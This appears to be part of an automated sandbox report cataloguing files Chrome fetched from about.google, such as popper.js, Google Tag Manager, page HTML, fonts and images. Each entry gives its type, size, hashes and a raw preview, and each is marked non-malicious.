                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/4OMr0tkN-puVthzh9N6e028DIaYljPtm3HD-WZXJ7i1PijG206V92KtvEIUytIinK9qAhGQPWxlt80Sx8mtoT_XrLrfBwJPlQVRn7Vxnv7hGFPJ8wZ1t=w1440-l90-sg-rj-c0xffffff
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ...."..........................................N........................!1..AQ..."aq..2....BR...#$br...3.%S&4Cc..s5....d.6DT.................................>........................!1.A."Qa.2q.#....3R..$4Bbr....%5CS..............?..$...j?.b.V........&.2H.._......T.U.....]Wk[%.=Vm.}P....]Qf...^X..t....S&.J$;.(...cF.. o.hp....Y+.|#Q.......i.....n....C.,.in..|t.K.NfEz8+..#y5Q..(..I.Y..X.....x[OF.o).......-...yL.&~.m...U...T....c..4?x.4.....\..`.R..9...^..*...qN....&(..gI...]....#.aI..-....&..>..._..v.Q..Sh.w..?.......hO1.}...^.<...R.Ovk...8.k..P...S..q..!..56).Y..YQ..Q..X..S&..K.....Z.......`~...{..^.uk.E.I..>....-..5.F.....zZ..G...<'....././R...V-..k.6<s.|.........../hU.....&.D.w..x.Y.....f.l.{.....dF...-.b.%..@@!(.bX9).8.kr[gE....R. `-..syG.>.e.._TUu.....z........+../.(...w.|3W..W7o./....I
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (19015)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):19188
                                                                                                                                                                                                                                                            Entropy (8bit):5.212814407014048
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
                                                                                                                                                                                                                                                            MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                                                                                                                                                                                                            SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                                                                                                                                                                                                            SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                                                                                                                                                                                                            SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                                                                                                                                                                                                                            Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (19570)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):211124
                                                                                                                                                                                                                                                            Entropy (8bit):5.560349679318281
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:aNKz5OCXeUvKq8GaP8iU00aLZB6komToCza32ZnSG8GZ0bie6GA7lVXp:fXeUvKdGaP8CLn5jTHza3gSG8cGA735
                                                                                                                                                                                                                                                            MD5:B28D8A3AB38AFD966D0BDAADF8D97D1D
                                                                                                                                                                                                                                                            SHA1:22242680D51EE6FA27D9FA2AF83958793DC9D323
                                                                                                                                                                                                                                                            SHA-256:B517EB2A353B05458EAB301D333E0D5D00D0378CA9EA5DE791775C6AE3CE1642
                                                                                                                                                                                                                                                            SHA-512:D46108E7B4E89CEED0AFFC67E4E622B4AC31A182992F0E817559AD43F7B4447C4B30095D8DE779500B7337AADD98931FBA1F81AACCFCFA29AAE797F0FA0A0D7D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.googletagmanager.com/gtag/js?id=G-YGRLMNPG7B&l=dataLayer&cx=c
                                                                                                                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved..(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":"google.ch"},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":20,"vtp_rules":["list","about\\.google"],"tag_id":20},{"function":"__ogt_referral_exclusion","priority":10,"vtp_includeConditions":["list","about\\.google","myaccount\\.google\\.com","account\\.google\\.com"],"tag_id":18},{"function":"__ogt_1p_data_v2","priority":10,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 105 x 105, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4173
                                                                                                                                                                                                                                                            Entropy (8bit):7.8956953682709505
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:W/RQ6HCkz6LvFaUsPiUhOf3a0PxzRvPjAAPPwbLwqcyNDTO:W/u6HCkJUxOOfq2RXjzPPw4IO
                                                                                                                                                                                                                                                            MD5:DBD0D89B37A1FF75D8C666187AD4A6A4
                                                                                                                                                                                                                                                            SHA1:B1685C4D61AA02DB3AF15399B599454F7FCB01D0
                                                                                                                                                                                                                                                            SHA-256:D2C4C0B0A294C3B9F96A6FBDE8C38D8E8C74E84111F8F48CB5C628A568C35D26
                                                                                                                                                                                                                                                            SHA-512:BE38E7BAB4A5B88A8ED114777E9D558FD10D326138582C68E1FE7E523E6C689B75DC3C498F9BD6BC73438D3C70ACAF7178B9E210A8333D42D6A1CD972AD09E6B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...i...i.....9..:....IDATx....S.g...l.&.7..J....}./..n.$..b..x!.l.71...\r.9..FE4b...#.....0.s...-h.a.q+....>Ow..z.{.{....o.B.5.._?.=./.@../..R.. M|T.........r.{..]L...-.aV.kI5.<P.W.n....T...5....=#/..|=.G.....O]\...Oa.W........f{W..,.f..6cb.Oaz..D.@Kk<......2$,|H...K..].....H....>..j\!....e....P..;Z....BJ.=.6....M$.yq....Y.(. .U..$.y......".....i."$.yq.D.U..8..0.."...H..F....z<.1D..6.0.U$.yq.4O.Pd.G.t..Eq...J.4O.Hz.I.:.H......B..R...#......W.H..@..G.H.).....I#.(b...p.?.H.+.<.....U.~.M.y.$....4.6y.}~."I.Db.I#M.y...#......*..+f...+...............=.....v..}....v..]..}..!..y.....Sx..G=..U.@%....~0....=...?.{...!..b.`.n.v..u..$.8...U.HK5.p.]...7.B."..K...NPH.4L....p.._E..y.......H#.......P.%.A")....*.........;w..........B.4;J@.H8.::.`6...t../.(.HV..n.H.%q...U?.u....8..0P.=........{.]E.42.Z..7X.l...r....Hv...H.5.v...8..|..v_d@.?.?....<....'.f........U4....i.M..s:.*.H."..l./...\..d.4^s..(....B>.R.....w..f.._M$.}.....a.W.o.a
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x219, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):219499
                                                                                                                                                                                                                                                            Entropy (8bit):7.733978106983294
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:aRNRNRoD/G3VAW9Zi600000T5Z5+5+5Gz2ZHn5:aRNRNRyGFANII88n5
                                                                                                                                                                                                                                                            MD5:9F82D5F4E4F23186D62A3AF5D1C7FAEB
                                                                                                                                                                                                                                                            SHA1:72C0204695A55C542D6CEFC4D0516D9913780090
                                                                                                                                                                                                                                                            SHA-256:7A01925FA285A40782F559448140282106322303C2A262F939E563BF7B4E49B1
                                                                                                                                                                                                                                                            SHA-512:3D093AB96C737EDAE22EDAF4CD70F097D3DEEE6483FF1DD1A92018D92FD9938E7288A6B59C15BDB03030810FFF213764A4387443BF9DCB1CAC0ED75A07996476
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa......ICC_PROFILE......XKCMS....mntrRGB Lab .........2..acspMSFT....KODAsRGB........................KODA................................................A2B0...D...4bXYZ...x....bTRC.......B2A0......jcprt.......Gdmnd...L...wdmdd.......[gXYZ... ....gTRC.......lumi...4....wtpt...H....desc...\...zrXYZ........rTRC.......vued.......Fview...4...$mft2.....................................................g.......6.....Q.......O.(...........-.W.......k.....I.......\ .!.#.$X%.&.(.)A*x+.,.../I0{1.2.4.576d7.8.9.;.<6=^>.?.@.A.C.D:E\F}G.H.I.J.L.M5NQOmP.Q.R.S.T.V.W.X3YIZ_[t\.].^._.`.a.b.d.e.f'g6hEiSj`knlzm.n.o.p.q.r.s.t.u.v.w.x.y.z.|.}.~..........!.$.'.).*.,.-.........-.,.*.).&.$.!..........................................w.l.a.V.K.?.3.'.....................p.a.Q.@.0................~.k.X.D.1..............v.`.J.4.............{.c.J.2............h.M.3...........v.Z.>."...........u.X.:.........g.......6.....Q.......O.(
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2941)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):184740
                                                                                                                                                                                                                                                            Entropy (8bit):5.468276131876206
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:4g50BiA6vFm/CyxpkoCrBKA9pRqVgOH3Uzs46nhr2qcNfOXV+Uq7M1sYvELmLMCl:NcalBK9bEQQqA+8O4LEyhAVxQ+
                                                                                                                                                                                                                                                            MD5:DB535D4B02F73F1D27A89ECCDDEEEA1F
                                                                                                                                                                                                                                                            SHA1:CF22D9A06FF0476F3DDF26E1BCFAF6F9F3FE81EC
                                                                                                                                                                                                                                                            SHA-256:53309AD212AF0976F57D352E326F46E886A43C986650E402D5779521027C2642
                                                                                                                                                                                                                                                            SHA-512:08251F494E74222A4C71EBE1961E159A8D70FC8BF3505E5A141ECAAA79A818395D1F6FE950173B1179317AD735A2C8093B9BB3D9B0487FC65D5A6A64D7F05190
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.DLVh3rihYK8.es5.O/am=gNcGAAAE/d=1/excm=_b,_r,_tp,calloutview/ed=1/dg=0/wt=2/rs=AM-SdHu6HjEOujLQ9sAjeCTemtKmkNBHxA/m=_b,_tp,_r"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi||{};(function(_){var window=this;.try{./*.. Copyright 2013 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2011 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/./*. SPDX-License-Identifier: Apache-2.0 */./*.. Copyright 2005 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2008 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2020 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/.var ia,la,Ma,Ra,Wa,Xa,Ya,Za,$a,ab,bb,cb,fb,gb,hb,kb,lb,mb,ob,pb,qb,Cb,Fb,Hb,Nb,Yb,Zb,jc,oc,sc,tc,uc,rc,wc,zc,Bc,Cc,Qc,Nc,Uc,Xc,jd,nd,kd,pd,qd,wd,Dd,Id,Md,Nd,Td,Vd,ce,je,ye,se,Ge,Ie,Je,Le,af,cf,jf,kf,sf,wf,xf,yf,zf,Af,Bf,Jf,Lf,Pf,Uf,aa,Vf,Wf,Xf,$f,ag,cg,dg,kg,lg,mg,pg,sg,qg,rg,tg,ug;_.ba=function(a){return function(){return aa[a].apply(this,arguments)}};
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (462)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):95874
                                                                                                                                                                                                                                                            Entropy (8bit):5.068287234923375
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:RVuFahIWj/Ca3CK3XZQZyLGOTvnPjN1xTt7Flhv:RMFahIY/CuDjv7Fnv
                                                                                                                                                                                                                                                            MD5:957E5E1F879EDC1D81AA81E6E507A862
                                                                                                                                                                                                                                                            SHA1:544A6B04A5B6FC2F3A5502043F0F25B6F0B718A9
                                                                                                                                                                                                                                                            SHA-256:58DD15A4AC1D28F2CE63AAAA7AC24D632F59FFF7E5862376EC34526211C18BEE
                                                                                                                                                                                                                                                            SHA-512:E8257A0F9A9BEA4D6214B0428B3F5E221DBBB8B8632D41960BCD8BE74B823530F40C0381B5CD08FD3F4132FC502FAB2CA16033E6EFF730357013A1788E2645D1
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/?hl=en-US
                                                                                                                                                                                                                                                            Preview:..<!DOCTYPE html>....<html lang="en" dir="ltr" class="google glue-flexbox " locale="root" user-region="north-america" path="/">. <head>. <meta charset="utf-8">. <meta content="initial-scale=1, minimum-scale=1, width=device-width" name="viewport">. <title>Google - About Google, Our Culture &amp; Company News</title>. <meta name="description" content="Stay up to date with Google company news and products. Discover stories about our culture, philosophy, and how Google technology is impacting others.">..<script type="text/javascript" nonce="qKNMbbrQipoLr-dd3-Xq_A">.window.dataLayer = window.dataLayer || [];.window.dataLayer.push({. 'gtm.blacklist':['customScripts','nonGoogleScripts','nonGooglePixels','customPixels'].},{. 'locale_fallback': (document.childNodes[1].attributes.locale || {}).value.});.</script>. Google Tag Manager -->.<script nonce="qKNMbbrQipoLr-dd3-Xq_A">(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':.new Date().getTime(),event:'gtm.js'});var
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (789)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):11909
                                                                                                                                                                                                                                                            Entropy (8bit):5.42561032485909
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:nYBnyqfzxO+peIUM0i0lYbacvB9hiOh5Jyk+3TAxUe1OZjR:nYBnyqfVO+peIUVi0+acvzUOskSCOlR
                                                                                                                                                                                                                                                            MD5:0A91B4613FB12249161702D9D600F676
                                                                                                                                                                                                                                                            SHA1:8B7CF262200BBA08F7E784BEBEF2ADCB6DC0CB38
                                                                                                                                                                                                                                                            SHA-256:2EB5128C4C7BBB2C624276F62BAA501653A0D2BFEF00F28012DB49736545FEA4
                                                                                                                                                                                                                                                            SHA-512:3650A944EAE4C8363B1B68377985542D012A14F0584B9E2BE41246554F449022AAA9CBA48C6A0EA4EBF5779A59726BC446787C14A84C41DDE59FC98E42660858
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-stories-2021/js/polyfills.min.js?cache=8b7cf26
                                                                                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var a=a||{};a.global=this||self;a.exportPath_=function(b,c,d,e){b=b.split(".");e=e||a.global;b[0]in e||"undefined"==typeof e.execScript||e.execScript("var "+b[0]);for(var f;b.length&&(f=b.shift());)if(b.length||void 0===c)e=e[f]&&e[f]!==Object.prototype[f]?e[f]:e[f]={};else if(!d&&a.isObject(c)&&a.isObject(e[f]))for(var g in c)c.hasOwnProperty(g)&&(e[f][g]=c[g]);else e[f]=c};a.define=function(b,c){return c};a.FEATURESET_YEAR=2012;a.DEBUG=!0;a.LOCALE="en";a.TRUSTED_SITE=!0;.a.DISALLOW_TEST_ONLY_CODE=!a.DEBUG;a.ENABLE_CHROME_APP_SAFE_SCRIPT_LOADING=!1;a.provide=function(b){if(a.isInModuleLoader_())throw Error("goog.provide cannot be used within a module.");a.constructNamespace_(b)};a.constructNamespace_=function(b,c,d){a.exportPath_(b,c,d)};a.getScriptNonce=function(b){if(b&&b!=a.global)return a.getScriptNonce_(b.document);null===a.cspNonce_&&(a.cspNonce_=a.getScriptNonce_(a.global.document));
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 900x1200, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):124465
                                                                                                                                                                                                                                                            Entropy (8bit):7.984969450412956
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:oJFXjJOg83nf+UrRub4mrITuzeJvbG+BGoejwIqDFkKdL8izKPL8Li73HkLV:ovXdOg837rRuTITYew+BGpjwIqpKL33K
                                                                                                                                                                                                                                                            MD5:A2D501A17EC67D2A6A90C3567AACA13D
                                                                                                                                                                                                                                                            SHA1:07498F5E9A6DF0759C344A5F2D5964FB4F3C343D
                                                                                                                                                                                                                                                            SHA-256:1AFB73A8921C049A01E7BFD882A7852B25A32EBE128EE4A5BA8C835062E35277
                                                                                                                                                                                                                                                            SHA-512:E1BE0CD613952E5A6963DA160ABD52DA1E682013CF07803E07FD9261D4CBBDF5A2890A36AE0D6ABE2029E7FABD0176FD1C42A741CEBA4F5771D684A1123DA614
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/jcu0uhAhK_fAiuPSrVmgIQxcwSxkTkHtGP4XRFhnh497_XGtN_KEA_0eCFdxXHxkMfWUk9uXhMkQBd_GImeJd7Tna6dRuRTTYpFCPSpzJ9Lhpp0egzQ=w1440-l90-sg-rj-c0xffffff
                                                                                                                                                                                                                                                            Preview:......JFIF...........................................................................................................................................................".........................................Q........................!1..AQa"q....2......BR..#b..r.3......CSc$%s...t....4Td................................7......................!.1..AQ."a2q....#.....BRb..r3C.............?..u.Q...5d..5M.X.[.(Z7.g,5l...y.....;........A.-..........*..V.-.l..2...!y.e....NSzB...-...S..T.8.rL.H ...[..9.<....#.U...>.i.zKT.,...]L.8.2..-..%^...Re.T.l....T...fi....u+.8.$pKd....#4...L..(.J..X.........N(..... ./.%c.1.f....T....D......t...Y3X5...Y.TU..8.>.UM.}<...Z`...(.R..ms..5h......L U..dT."j.#Z.Z.=....$...SRJ.._.J..j..j.#iR..Z.iM............E....B.^X.d[.Pn.......un.&D........h..e.1Tn....6U...,^iS1.E.9X...4hW..I...Y*aU.[9LF.l.H.l..1..B......y.Kt:...y..D.8}>I.bEB..e.]Y.6.jOPR..!|.."c3PR5../.T..Tl.K...E........N.M...8..CO"5.Ih.#..n.k..JhS1e.-.Y.]QF......h..Q \.H.R.u)Vg
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 914 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):145714
                                                                                                                                                                                                                                                            Entropy (8bit):7.981160606096131
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:Aw/3HjAFZfY8F6cd4mITyjwBzCN2Pg7inZIQZk/vLh/T:L3QlY6rf1wB2N2LnZIQZk/vLh7
                                                                                                                                                                                                                                                            MD5:CDB0226559B5391D0F732963964BD9B3
                                                                                                                                                                                                                                                            SHA1:B04BB4778185C92F4ADA0819DFB7FC66F4095521
                                                                                                                                                                                                                                                            SHA-256:F3E0EE4CD6E1E9A35C1B1E04D54F460F2C1CD0FAE443767A97953CA2E9D33DEE
                                                                                                                                                                                                                                                            SHA-512:8D916673C4CA819039F47268B2778A2D4706E7F5F4DB5B0CD4AEA3324D1DFE131BF1F1EC56C4F690EE09C1AB7D15101357B84A65E9E291BBC7B2A50278CA8FF8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...............(Y....PLTE..............................................jhpUS\;5@DCMLKU_]fvt|<:H'&3$#1)*9.,7!!/. /..0-.>61:43B1/:''5)(4&%2#$3!"1"%5E:>VIF%&6,)4."2..0$#.*'2#"/&$0&$.(%/rbX/*22-6($.(%1-)1,&/.*3+(3,)3=39A22D435-2*&01+16,.:--0)0,'1*%..(0.&-=/00(.MA=>/,7-/2+0@0+J=G9.3=13<.,3)-5,/8+,^4'.? .>.z8!h7&J72G52L1*.D..K..M%N82q6#4+0R:3E0+.7.W*&.2.b+$U<3A1.J))T3)i,"o,!u- y-._4Aq8HC,7.H".;!O/;.=Nw@(D5LD4C.D(.J'N:4^@3X=3.3![?3aB3.?U.7!mNadC4jF4C5:.M'WF>`I?_NGT@9H97^D9gM@gRGgE4cUOm]RlXLnRBfH9sZJu_PyeVzj\lJ9qUEnN=}ob.N'lG4586.Z#.P!.]/..F.7.+.j,.E..D..B .=..D..H.7.> .v..-./.*.uG.(.Y+.e$.s&Q@UVFeK<b...G8V\Lq.[I.eN.[bUI..iaRDv.gIkN.N?m9@5YQ..yFlZ...O..C..O..H..Y..d..MlT.^X.y`.j^.lb..v.{s..z.vp.pl.kh.lj.sn...rml.nk.lj.kf.ic..yT~e.wt..V.[..T..N|.`g.LuG$ ..j..[..l.................Z...5.IDATx......... ..6.T1....................@..dm.0...._..i.W..V_.....s..SMD.*s..tw.0.."..D..q.D3...f:O.a...[..@4........]uY.B.7.I....c....H.....l...H.5-.}.xf'l...XW.....Ij...1.:..6.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1000 x 400
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):111137
                                                                                                                                                                                                                                                            Entropy (8bit):7.918671597499378
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:/VHmr5Z2oX9nB0o22CYomlnfn5ASqSA/XokWRz:V4Bx22CY7NuSq/rWd
                                                                                                                                                                                                                                                            MD5:6CBFCE836B866D3DF41CA944AEBAA9F9
                                                                                                                                                                                                                                                            SHA1:FDFA012E6F1E1064E636F9F7EC85A655F18DA246
                                                                                                                                                                                                                                                            SHA-256:7747B4FEDB21EC59AA19319F08C5289A86ADEB37FE0B21D4C250EAFA8F37B50D
                                                                                                                                                                                                                                                            SHA-512:486F8457E2BE3D829E0B8B3F7998389500B1A2CCA65C34ADAD67F8AFE1920E8CF19634E738EF26AB6544A42F5A4EB1D7F2521BA69A29622E85ABDA4DE73F3931
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89a.................HV.5F..... t...Jd.................................[...........5Pk.......(........r....ltiS[L...........|....l..&5.........Uj...b..................p..y....Yy.......u...........................Wb....al..-Z..............i..y...jt.@Y.......$5.hs...........e.................y.p.......R..........VdS.............(.].....{..s{......Xkj............................................j.............bk_..........d.\...w......!B.cia........~.W...e}.......]............W.........y....\.....................e......!9t..].......n..........|...........................................V..................................................................................................k.......................e..i.....]...........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 21716, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):21716
                                                                                                                                                                                                                                                            Entropy (8bit):7.988919175869214
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:DfspV407P6+jGlbMAA2cdv92Dg3AuGZ0KGKBb2ZXdWgb98JmSKMrN:D64Ei+n2c19NuqKuZXdWv79N
                                                                                                                                                                                                                                                            MD5:D4FF90DB5DA894C833F356F47A16E408
                                                                                                                                                                                                                                                            SHA1:30606044507D81B996C992895AB16B8A8D68BE97
                                                                                                                                                                                                                                                            SHA-256:F2C761EE3CE27469F940A05B64E38A829A400427727CD0BDBB4E36F1D572AFD7
                                                                                                                                                                                                                                                            SHA-512:85C6305EE6973EBF449EFCFC95BB10A66E5CBA92D026A2EC4F1072DC8CCBC5B4A4A384FE425E53E2DADE2180F37CCA56243ED354033CFCA5821CBB77FB8B0FA1
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94YtzCwY.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......T........P..Tp..........................4..,..@.`..~..d..u.....<..4.....6.$.... ..V..X..^...'..:...m......?..ts..6(#k.y........ON....Mn..X..~X%A...T...q.r.L..9..B}#e....*}......{..l.I>.n....*.u.>v(..}lo.2.f..D.TG...:mc.3.M..A...../aJl..ZT.b.S.E}..wq.B...&...Y..s.o....Qs....>.]u^O....d..Y....oEfh.........u..X.....E.3c*....r...Eb.....N2+%\...J.6]N:.g[~..,..>@.`IXs........LP...c.!K.X[......A7Z....O..g....5..1...=..X....e!._.A..u.raef..y.....>li,/+..-.P-)...w.I..3\..s^.....T.\.1.;.x.:.r.7g...dK.$;....L2.t.i..hz.....>............5...,~}...W#..X.2...E,.Y.3..f.#........[..X......fDW.d...Y..8..T....^.{BC...+.W..9...`...\ ...c`.nc........_...}6A5eM.0r.IG...Km...l.'.o..py.~7.........P....9...hI.A'...D9.....4Q...9sc..9..........9lw.P...dI..z...S.>U.5.@Z...{.....=`R(...l.T.5...4{K....*.L..A.]...Rg.3......l..a......I.>...p.q.H.E=.$...Ps..LU..=.$......YU....#Fn..Q..c...B...4...B..3....?....ywJ.$.I..L....yK...m.!..b_g.eH.3,.5 .@.D.........)N.?.<yR......Ro
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, baseline, precision 8, 550x220, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):58040
                                                                                                                                                                                                                                                            Entropy (8bit):7.967406093557375
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:1eE8Ve3xt1CVslBbsReDhZP6J+aepA7aeP:1V82YVsboI/kvieP
                                                                                                                                                                                                                                                            MD5:722623C3B5E4A1CA8FCC9F6C2A323192
                                                                                                                                                                                                                                                            SHA1:43C0CA341DCEC858F834E9D2729D1A1A5AE75683
                                                                                                                                                                                                                                                            SHA-256:EE54DA4C64E188578802FBEBC4586F58B0DA9AB69DBDC44169EC465DF6DB8499
                                                                                                                                                                                                                                                            SHA-512:1E2871927D3486E2BE5ACB6E38A0DF563CE5069CF59852F0591980264E04966B6305E524DFB533923944C583977469914F78D19CEA2513B04F66523709D3482E
